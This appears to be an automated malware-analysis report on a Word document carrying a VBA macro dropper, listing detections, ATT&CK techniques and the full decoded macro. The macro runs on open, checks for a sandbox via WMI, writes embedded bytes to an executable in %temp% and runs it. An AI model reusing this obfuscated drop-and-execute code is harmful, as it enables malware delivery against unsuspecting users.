MALICIOUS
390
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The document body presents a lure to enable content, claiming it is RSA encrypted. The VBA macro utilizes WScript.Shell to create objects and interact with the environment, likely to download and execute a second-stage payload. The presence of WScript.Shell and CreateObject calls strongly suggests malicious intent.
Heuristics 12
-
ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set sixtieth = VBA.CreateObject("WScript.Shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set sixtieth = VBA.CreateObject("WScript.Shell") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set charlatan = GetObject(hypocritical & ".\root\cimv2") -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
binghamton = CallByName(sixtieth, rant, VbMethod, "%temp%") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Public Sub AutoOpen() -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4266 bytes |
SHA-256: c292d1e82e67439b0fd768ceaab166689ba1ec750346918496e481c217b30b92 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Document"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FormatTablesSelect()
Dim oTb As Table
For Each oTb In ActiveDocument.Tables
Select Case oTb.Style
Case "Light Shading - Accent 4"
oTb.AutoFitBehavior (wdAutoFitFixed)
oTb.Rows.Alignment = wdAlignRowCenter
oTb.Columns.PreferredWidth = InchesToPoints(0.6)
Case "Medium List 2 - Accent 4"
oTb.AutoFitBehavior (wdAutoFitWindow)
oTb.Rows.Alignment = wdAlignRowLeft
Case "Table Grid", "Table Normal"
oTb.Style = "Light Grid - Accent 4"
Case Else
oTb.Style = "Medium List 1 - Accent 4"
End Select
Next oTb
End Sub
Public Sub AutoOpen()
Dim topmast As String
Dim mignonette As Integer
Dim canny As Long
mignonette = irena.pipefish
If mignonette = 84 - 29 + 26424 Then
FormatTablesSelect
Else
caprice = 84 - 75
odds = 62 - 28 + 30
For caprice = 84 - 75 To 62 - 28 + 30
person = Right("eisenhowerda", 2) + "rn"
Next caprice
irena.hagridden
End If
End Sub
Attribute VB_Name = "irena"
Sub hagridden()
Dim mosslike As Integer
tableland = "nike"
Dim binghamton As String
Dim interferon As Long
Dim disagreeing As String
bushes = 69 - 16
unmusically = 79 + 109 - 94
If bushes + unmusically > 89 Then
bialy = "am" + "oral" + "ism"
End If
Set sixtieth = VBA.CreateObject("WScript.Shell")
rant = UCase("ExpandEnvir") + LCase("onmentStrings")
binghamton = CallByName(sixtieth, rant, VbMethod, "%temp%")
Dim gluon As Integer
disagreeing = binghamton & "\amnestic.exe"
Dim zombi As String
Dim halfbeak
Dim benzene
benzene = FreeFile
Dim confusing
confusing = 0
Dim glossopsitta
Dim carload As String
halfbeak = confusing
audacious = Deep.Depression
Dim drynaria As Long
agape = audacious
maleficent = Len(agape)
halfbeak = 1
Dim frisian As String
Open disagreeing For Binary Access Write As #benzene
Dim bounteousness As Byte
sarsaparilla = 1 + 39 - 8
cabined = 28 - 3 + 33
For sarsaparilla = 1 + 39 - 8 To 28 - 3 + 33
advoutry = "ha" + "emulon"
Next sarsaparilla
ascendancy = 1 - 54 + 55
For gunwale = halfbeak To (maleficent / ascendancy)
Call irena.margin(benzene, agape, halfbeak)
halfbeak = halfbeak + 2
Next gunwale
necessary = 118 - 96
amerind = 83 + 104 - 113
For necessary = 118 - 96 To 83 + 104 - 113
bicephalous = Right("communicationalcl", 2) + Right("spoilerothe", 4) + "s"
Next necessary
Close #benzene
binghamton = CallByName(sixtieth, "Run", VbMethod, disagreeing)
End Sub
Public Sub margin(ByRef hanaper, deformity, buoyantly)
frau = VBA.Mid(deformity, buoyantly, 2)
Put #hanaper, , CByte("&" + Chr(125 - 53) & frau)
End Sub
Function pipefish()
Dim voluptuary As Object
hiation = Left("Seasperges", 2) + LCase("lEct")
Dim arthritic As Long
monocot = 33 + 50 - 83
betrothed = 105 - 44
encomium = 119 + 94 - 118
If betrothed + encomium > 53 Then
mixtura = UCase("Jel") + "lyfis" + LCase("H")
End If
africanamerican = UCase(" * F") + StrReverse("_23niW mor")
Dim meatless As Long
objectionable = Left("Discato'ninetails", 3) + "kDriv" + StrReverse("e") + ""
hypocritical = UCase("Win") + Left("mgmtsholometabolic", 5) + ":\\" + ""
Set charlatan = GetObject(hypocritical & ".\root\cimv2")
dessertspoon = 7 - 33 + 93
academicianship = 39 + 19
If dessertspoon + academicianship > 95 Then
carthorse = StrReverse("ua") + Right("chilledctio", 4) + "n"
End If
Set israel = charlatan.ExecQuery(hiation + africanamerican & objectionable)
For Each calculable In israel
monocot = monocot + 65 - 5 - 59
Next
pipefish = monocot
End Function
Attribute VB_Name = "Deep"
Attribute VB_Base = "0{ADBEA1FE-674E-4B08-8C5E-5BA54F7638AD}{D6D79688-B5A3-40CB-AD62-40212B48FD10}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.